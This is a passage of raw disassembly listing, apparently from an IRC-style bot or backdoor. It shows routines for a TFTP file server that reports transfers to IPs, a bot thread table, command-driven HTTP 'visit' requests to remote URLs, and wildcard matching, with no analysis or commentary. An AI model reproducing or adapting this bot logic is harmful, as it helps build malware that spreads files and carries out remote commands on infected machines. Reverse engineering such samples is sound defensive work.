mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_416106
inc al
xor cl, cl
mov [ebp+var_57E], al
mov [ebp+var_57D], bl
jmp short loc_416114
; ---------------------------------------------------------------------------
loc_416106: ; CODE XREF: sub_415CF4+3FE�j
inc cl
mov [ebp+var_57E], al
mov [ebp+var_57D], cl
loc_416114: ; CODE XREF: sub_415CF4+410�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_41B7D0
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_419D90
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call dword_44B724 ; sendto
cmp edi, ebx
jnz short loc_416193
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset aTftpFileTran_2 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_416037
; ---------------------------------------------------------------------------
loc_41617D: ; CODE XREF: sub_415CF4+268�j
; sub_415CF4+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_442ADC
push edi
call dword_44B724 ; sendto
loc_416193: ; CODE XREF: sub_415CF4+204�j
; sub_415CF4+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_415E9F
loc_41619F: ; CODE XREF: sub_415CF4+1B4�j
push edi
call dword_44B758 ; closesocket
push [ebp+var_8]
call sub_419740
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_4161D3
push [ebp+var_170]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_4161D3: ; CODE XREF: sub_415CF4+4CA�j
push 3E8h
call ds:dword_4942D8
push esi
loc_4161DF: ; CODE XREF: sub_415CF4+123�j
call sub_415CF4
pop edi
pop esi
pop ebx
leave
retn 4
sub_415CF4 endp
; =============== S U B R O U T I N E =======================================
sub_4161EB proc near ; CODE XREF: sub_402994+F0�p
; sub_402994+20F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_44CE58
loc_4161F3: ; CODE XREF: sub_4161EB+18�j
cmp byte ptr [eax], 0
jz short loc_416207
add eax, 234h
inc edi
cmp eax, offset dword_491BE8
jl short loc_4161F3
jmp short loc_416252
; ---------------------------------------------------------------------------
loc_416207: ; CODE XREF: sub_4161EB+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_44CE58[esi]
push eax
call sub_4191A0
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_44D058[esi], eax
and dword_44D05C[esi], 0
mov eax, [esp+8+arg_8]
and dword_44D060[esi], 0
mov dword_44D064[esi], eax
and byte_44D070[esi], 0
pop esi
loc_416252: ; CODE XREF: sub_4161EB+1A�j
mov eax, edi
pop edi
retn
sub_4161EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416256 proc near ; DATA XREF: sub_40C50A+5BF5�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_4162A8
push [ebp+var_14]
call sub_416507
add esp, 14h
push 0
call ds:dword_4942FC
pop edi
pop esi
sub_416256 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162A8 proc near ; CODE XREF: sub_416256+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
xor edi, edi
mov esi, offset dword_44CE58
loc_4162D2: ; CODE XREF: sub_4162A8+78�j
cmp byte ptr [esi], 0
jz short loc_416313
cmp [ebp+arg_C], 0
jnz short loc_4162E6
cmp dword ptr [esi+204h], 0
jnz short loc_416313
loc_4162E6: ; CODE XREF: sub_4162A8+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S_0 ; "%d. %s"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 24h
loc_416313: ; CODE XREF: sub_4162A8+2D�j
; sub_4162A8+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_491BE8
jl short loc_4162D2
pop edi
pop esi
leave
retn
sub_4162A8 endp
; =============== S U B R O U T I N E =======================================
sub_416326 proc near ; CODE XREF: sub_40C50A+4DED�p
; sub_4163B4+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_4163AE
cmp esi, 1F4h
jge short loc_4163AE
imul esi, 234h
push edi
push ebx
push dword_44D06C[esi]
lea edi, dword_44D06C[esi]
call ds:dword_4943D4
cmp [edi], ebx
jz short loc_41635E
push 1
pop ebp
loc_41635E: ; CODE XREF: sub_416326+33�j
mov [edi], ebx
lea edi, dword_44D060[esi]
mov dword_44D058[esi], ebx
mov dword_44D05C[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_41637F
push eax
call sub_40B813
pop ecx
loc_41637F: ; CODE XREF: sub_416326+50�j
mov [edi], ebx
lea edi, dword_44D064[esi]
mov byte ptr dword_44CE58[esi], bl
mov byte_44D070[esi], bl
push dword ptr [edi]
call dword_44B758 ; closesocket
lea esi, dword_44D068[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_44B758 ; closesocket
mov [esi], ebx
pop edi
loc_4163AE: ; CODE XREF: sub_416326+D�j
; sub_416326+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_416326 endp
; =============== S U B R O U T I N E =======================================
sub_4163B4 proc near ; CODE XREF: sub_405938+18�p
; sub_409D2E:loc_409D52�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_44CE58
loc_4163C0: ; CODE XREF: sub_4163B4+2A�j
cmp byte ptr [esi], 0
jz short loc_4163D1
push edi
call sub_416326
test eax, eax
pop ecx
jz short loc_4163D1
inc ebx
loc_4163D1: ; CODE XREF: sub_4163B4+F�j
; sub_4163B4+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_491BE8
jl short loc_4163C0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4163B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4163E6 proc near ; CODE XREF: sub_40C50A+1CFB�p
; sub_40C50A+1DCE�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_44D05C
loc_4163FA: ; CODE XREF: sub_4163E6+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_41641C
test edi, edi
jle short loc_41640E
cmp [esi], edi
jz short loc_41640E
cmp ebx, edi
jnz short loc_41641C
loc_41640E: ; CODE XREF: sub_4163E6+1E�j
; sub_4163E6+22�j
push ebx
call sub_416326
test eax, eax
pop ecx
jz short loc_41641C
inc [ebp+var_4]
loc_41641C: ; CODE XREF: sub_4163E6+1A�j
; sub_4163E6+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_491DEC
jl short loc_4163FA
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4163E6 endp
; =============== S U B R O U T I N E =======================================
sub_416433 proc near ; CODE XREF: sub_40291D+B�p
; sub_402994+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_44D058
loc_41643A: ; CODE XREF: sub_416433+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_416443
inc eax
loc_416443: ; CODE XREF: sub_416433+D�j
add ecx, 234h
cmp ecx, offset dword_491DE8
jl short loc_41643A
retn
sub_416433 endp
; =============== S U B R O U T I N E =======================================
sub_416452 proc near ; CODE XREF: sub_40C50A+56A1�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_44D058
loc_41645C: ; CODE XREF: sub_416452+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_416475
add ecx, 234h
inc edx
cmp ecx, offset dword_491DE8
jl short loc_41645C
pop esi
retn
; ---------------------------------------------------------------------------
loc_416475: ; CODE XREF: sub_416452+10�j
mov eax, edx
pop esi
retn
sub_416452 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416479 proc near ; CODE XREF: sub_40C50A+5D9E�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_416492
push [ebp+arg_1C]
call sub_4195F0
pop ecx
loc_416492: ; CODE XREF: sub_416479+E�j
push eax
push [ebp+arg_18]
call sub_4163E6
pop ecx
test eax, eax
pop ecx
jle short loc_4164BE
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_418D70
add esp, 14h
jmp short loc_4164D8
; ---------------------------------------------------------------------------
loc_4164BE: ; CODE XREF: sub_416479+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_418D70
add esp, 10h
loc_4164D8: ; CODE XREF: sub_416479+43�j
cmp [ebp+arg_C], 0
jnz short loc_4164F8
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_4164F8: ; CODE XREF: sub_416479+63�j
lea eax, [ebp+var_200]
push eax
call sub_4035E1
pop ecx
leave
retn
sub_416479 endp
; =============== S U B R O U T I N E =======================================
sub_416507 proc near ; CODE XREF: sub_403076+206�p
; sub_40328A+238�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_44D06C[eax], ecx
mov dword_44D058[eax], ecx
mov dword_44D05C[eax], ecx
mov dword_44D060[eax], ecx
mov dword_44D064[eax], ecx
mov dword_44D068[eax], ecx
mov byte ptr dword_44CE58[eax], cl
mov byte_44D070[eax], cl
retn
sub_416507 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416544 proc near ; DATA XREF: sub_40C50A+498E�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset asc_442B40 ; "*/*"
call sub_4189A0
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_4189A0
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_4189A0
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_4189A0
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_4189A0
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call dword_44B5C8 ; InternetCrackUrlA
test eax, eax
jz loc_4166DE
cmp [ebp+var_34], ebx
jbe short loc_41661B
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_4191A0
add esp, 0Ch
loc_41661B: ; CODE XREF: sub_416544+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_416639
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_4191A0
add esp, 0Ch
loc_416639: ; CODE XREF: sub_416544+DE�j
cmp [ebp+var_20], ebx
jbe short loc_416653
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_4191A0
add esp, 0Ch
loc_416653: ; CODE XREF: sub_416544+F8�j
cmp [ebp+var_18], ebx
jbe short loc_41666D
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_4191A0
add esp, 0Ch
loc_41666D: ; CODE XREF: sub_416544+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push dword_44B670
call dword_44B694 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_4166F6
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call dword_44B688 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_4166FD
push ebx
push ebx
push ebx
push ebx
push eax
call dword_44B63C ; HttpSendRequestA
test eax, eax
jz short loc_4166D7
push offset aVisitUrlVisite ; "[VISIT]: URL visited."
jmp short loc_416702
; ---------------------------------------------------------------------------
loc_4166D7: ; CODE XREF: sub_416544+18A�j
push offset aVisitFailedToG ; "[VISIT]: Failed to get requested URL fr"...
jmp short loc_416702
; ---------------------------------------------------------------------------
loc_4166DE: ; CODE XREF: sub_416544+B7�j
lea eax, [ebp+var_55C]
push offset aVisitInvalidUr ; "[VISIT]: Invalid URL."
push eax
call sub_418D70
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_416710
; ---------------------------------------------------------------------------
loc_4166F6: ; CODE XREF: sub_416544+153�j
push offset aVisitCouldNotO ; "[VISIT]: Could not open a connection."
jmp short loc_416702
; ---------------------------------------------------------------------------
loc_4166FD: ; CODE XREF: sub_416544+17B�j
push offset aVisitFailedToC ; "[VISIT]: Failed to connect to HTTP serv"...
loc_416702: ; CODE XREF: sub_416544+191�j
; sub_416544+198�j ...
lea eax, [ebp+var_55C]
push eax
call sub_418D70
pop ecx
pop ecx
loc_416710: ; CODE XREF: sub_416544+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_41673B
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_40842D
add esp, 14h
loc_41673B: ; CODE XREF: sub_416544+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_4035E1
pop ecx
push esi
call dword_44B6F4 ; InternetCloseHandle
push [ebp+var_4]
call dword_44B6F4 ; InternetCloseHandle
push [ebp+var_1D8]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
pop edi
pop esi
pop ebx
sub_416544 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41676E proc near ; CODE XREF: sub_40C50A+61DC�p
; sub_41689C+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_416778: ; CODE XREF: sub_41676E+68�j
mov cl, [esi]
test cl, cl
jz short loc_4167D8
cmp eax, 1
jnz short loc_4167D8
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_4167D8
cmp cl, 2Ah
jz short loc_4167BF
cmp cl, 3Fh
jz short loc_4167A2
cmp cl, 5Bh
jz short loc_4167A7
xor eax, eax
cmp cl, dl
setz al
loc_4167A2: ; CODE XREF: sub_41676E+26�j
inc [ebp+arg_4]
jmp short loc_4167D2
; ---------------------------------------------------------------------------
loc_4167A7: ; CODE XREF: sub_41676E+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_416804
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_4167D2
; ---------------------------------------------------------------------------
loc_4167BF: ; CODE XREF: sub_41676E+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41689C
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_4167D2: ; CODE XREF: sub_41676E+37�j
; sub_41676E+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_416778
; ---------------------------------------------------------------------------
loc_4167D8: ; CODE XREF: sub_41676E+E�j
; sub_41676E+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_4167E8
cmp eax, 1
jnz short loc_4167FF
inc esi
mov [ebp+arg_0], esi
jmp short loc_4167D8
; ---------------------------------------------------------------------------
loc_4167E8: ; CODE XREF: sub_41676E+6D�j
cmp eax, 1
jnz short loc_4167FF
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_4167FF
cmp byte ptr [esi], 0
jnz short loc_4167FF
push 1
pop eax
jmp short loc_416801
; ---------------------------------------------------------------------------
loc_4167FF: ; CODE XREF: sub_41676E+72�j
; sub_41676E+7D�j ...
xor eax, eax
loc_416801: ; CODE XREF: sub_41676E+8F�j
pop esi
pop ebp
retn
sub_41676E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416804 proc near ; CODE XREF: sub_41676E+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_416825
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_416825: ; CODE XREF: sub_416804+19�j
push ebx
push esi
loc_416827: ; CODE XREF: sub_416804+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_416835
cmp [ebp+var_4], eax
jnz short loc_416881
loc_416835: ; CODE XREF: sub_416804+2A�j
test edi, edi
jnz short loc_416876
cmp bl, 2Dh
jnz short loc_41686A
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_41686A
cmp al, 5Dh
jz short loc_41686A
cmp [ebp+var_4], edi
jnz short loc_41686A
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_416876
cmp bl, al
jg short loc_416876
push 1
mov [edx], esi
pop edi
jmp short loc_416876
; ---------------------------------------------------------------------------
loc_41686A: ; CODE XREF: sub_416804+38�j
; sub_416804+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_416876
push 1
pop edi
loc_416876: ; CODE XREF: sub_416804+33�j
; sub_416804+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_416827
; ---------------------------------------------------------------------------
loc_416881: ; CODE XREF: sub_416804+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_41688E
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_41688E: ; CODE XREF: sub_416804+82�j
cmp edi, eax
jnz short loc_416897
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_416897: ; CODE XREF: sub_416804+8C�j
mov eax, edi
pop edi
leave
retn
sub_416804 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41689C proc near ; CODE XREF: sub_41676E+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_4168B8: ; CODE XREF: sub_41689C+3A�j
cmp [eax], bl
jz short loc_4168D8
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_4168CD
cmp cl, 2Ah
jnz short loc_4168D8
cmp cl, 3Fh
jnz short loc_4168D0
loc_4168CD: ; CODE XREF: sub_41689C+25�j
inc eax
mov [edi], eax
loc_4168D0: ; CODE XREF: sub_41689C+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_4168B8
; ---------------------------------------------------------------------------
loc_4168D8: ; CODE XREF: sub_41689C+1E�j
; sub_41689C+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_4168E3
inc dword ptr [esi]
jmp short loc_4168D8
; ---------------------------------------------------------------------------
loc_4168E3: ; CODE XREF: sub_41689C+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_416904
mov edx, [esi]
cmp [edx], bl
jz short loc_4168F5
xor eax, eax
jmp short loc_416964
; ---------------------------------------------------------------------------
loc_4168F5: ; CODE XREF: sub_41689C+53�j
cmp cl, bl
jnz short loc_416904
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_416904
push 1
pop eax
jmp short loc_416964
; ---------------------------------------------------------------------------
loc_416904: ; CODE XREF: sub_41689C+4D�j
; sub_41689C+5B�j ...
push eax
push dword ptr [esi]
call sub_41676E
pop ecx
test eax, eax
pop ecx
jnz short loc_41694E
loc_416912: ; CODE XREF: sub_41689C+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_416916: ; CODE XREF: sub_41689C+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_41692E
cmp cl, 5Bh
jz short loc_41692E
cmp dl, bl
jz short loc_41692E
inc eax
mov [edi], eax
jmp short loc_416916
; ---------------------------------------------------------------------------
loc_41692E: ; CODE XREF: sub_41689C+82�j
; sub_41689C+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_416945
push eax
push dword ptr [esi]
call sub_41676E
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41694A
; ---------------------------------------------------------------------------
loc_416945: ; CODE XREF: sub_41689C+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41694A: ; CODE XREF: sub_41689C+A7�j
cmp eax, ebx
jnz short loc_416912
loc_41694E: ; CODE XREF: sub_41689C+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_416961
mov eax, [esi]
cmp [eax], bl
jnz short loc_416961
mov [ebp+var_4], 1
loc_416961: ; CODE XREF: sub_41689C+B6�j
; sub_41689C+BC�j
mov eax, [ebp+var_4]
loc_416964: ; CODE XREF: sub_41689C+57�j
; sub_41689C+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_41689C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416970 proc near ; CODE XREF: sub_401000+7A�p
; sub_401000+8A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41697A: ; CODE XREF: sub_416970+1F�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
test edx, edx
jz short loc_416991
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
jmp short loc_41697A
; ---------------------------------------------------------------------------
loc_416991: ; CODE XREF: sub_416970+14�j
; sub_416970+4B�j
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov ax, [edx]
mov [ecx], ax
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
add ecx, 2
mov [ebp+arg_4], ecx
test edx, edx
jz short loc_4169BD
jmp short loc_416991
; ---------------------------------------------------------------------------
loc_4169BD: ; CODE XREF: sub_416970+49�j
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn
sub_416970 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
mov [ebp-4], eax
loc_4169DA: ; CODE XREF: .text:00416A04�j
mov ecx, [ebp-4]
mov edx, [ebp+0Ch]
mov ax, [edx]
mov [ecx], ax
mov ecx, [ebp-4]
xor edx, edx
mov dx, [ecx]
mov eax, [ebp-4]
add eax, 2
mov [ebp-4], eax
mov ecx, [ebp+0Ch]
add ecx, 2
mov [ebp+0Ch], ecx
test edx, edx
jz short loc_416A06
jmp short loc_4169DA
; ---------------------------------------------------------------------------
loc_416A06: ; CODE XREF: .text:00416A02�j
mov eax, [ebp+8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A10 proc near ; CODE XREF: sub_40119E+220�p
; sub_4013F1+C1�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 0
push 1
mov eax, dword_4920E4
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_416A80
add esp, 14h
pop ebp
retn
sub_416A10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A30 proc near ; CODE XREF: sub_416E40+20�p
; sub_416F00+26�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, dword_4920E4
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_416A80
add esp, 14h
pop ebp
retn
sub_416A30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A60 proc near ; CODE XREF: sub_41B010+9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push 0
push 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_416A80
add esp, 14h
pop ebp
retn
sub_416A60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A80 proc near ; CODE XREF: sub_416A10+13�p
; sub_416A30+19�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
loc_416A84: ; CODE XREF: sub_416A80:loc_416AD8�j
push 9
call sub_41BC90
add esp, 4
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_416B00
add esp, 10h
mov [ebp+var_4], eax
push 9
call sub_41BD30
add esp, 4
cmp [ebp+var_4], 0
jnz short loc_416ABF
cmp [ebp+arg_4], 0
jnz short loc_416AC4
loc_416ABF: ; CODE XREF: sub_416A80+37�j
mov eax, [ebp+var_4]
jmp short loc_416ADA
; ---------------------------------------------------------------------------
loc_416AC4: ; CODE XREF: sub_416A80+3D�j
mov ecx, [ebp+arg_0]
push ecx
call sub_41BB80
add esp, 4
test eax, eax
jnz short loc_416AD8
xor eax, eax
jmp short loc_416ADA
; ---------------------------------------------------------------------------
loc_416AD8: ; CODE XREF: sub_416A80+52�j
jmp short loc_416A84
; ---------------------------------------------------------------------------
loc_416ADA: ; CODE XREF: sub_416A80+42�j
; sub_416A80+56�j
mov esp, ebp
pop ebp
retn
sub_416A80 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
push 0
push 1
